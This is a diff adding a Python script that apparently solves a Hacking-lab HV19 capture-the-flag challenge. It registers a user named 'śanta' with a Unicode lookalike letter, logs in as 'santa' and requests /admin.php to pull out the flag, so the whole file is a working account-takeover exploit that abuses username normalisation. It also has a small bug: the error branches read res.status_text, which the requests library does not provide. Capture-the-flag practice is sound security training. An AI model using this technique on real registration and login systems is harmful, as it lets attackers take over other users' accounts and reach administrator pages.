|
@@ -0,0 +1,33 @@
|
|
|
+#!/usr/bin/python
|
|
|
+
|
|
|
+import requests
|
|
|
+import random
|
|
|
+import string
|
|
|
+import re
|
|
|
+
|
|
|
+BASE_URL = "http://whale.hacking-lab.com:8881"
|
|
|
+PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
|
|
|
+SESSION = requests.session()
|
|
|
+FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
|
|
|
+
|
|
|
+# 1. register user santa
|
|
|
+res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
|
|
|
+if res.status_code != 200 or "Registration successful!" not in res.text:
|
|
|
+ print("Server returned: %d %s" % (res.status_code, res.status_text))
|
|
|
+ print(res.text)
|
|
|
+ exit(1)
|
|
|
+
|
|
|
+# 2. login
|
|
|
+res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
|
|
|
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
|
|
+ print("Server returned: %d %s" % (res.status_code, res.status_text))
|
|
|
+ print(res.text)
|
|
|
+ exit(1)
|
|
|
+
|
|
|
+# 3. get flag
|
|
|
+res = SESSION.get(BASE_URL + "/admin.php")
|
|
|
+if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
|
|
+ print("Server returned: %d %s" % (res.status_code, res.status_text))
|
|
|
+ exit(1)
|
|
|
+
|
|
|
+print(FLAG_PATTERN.search(res.text))
|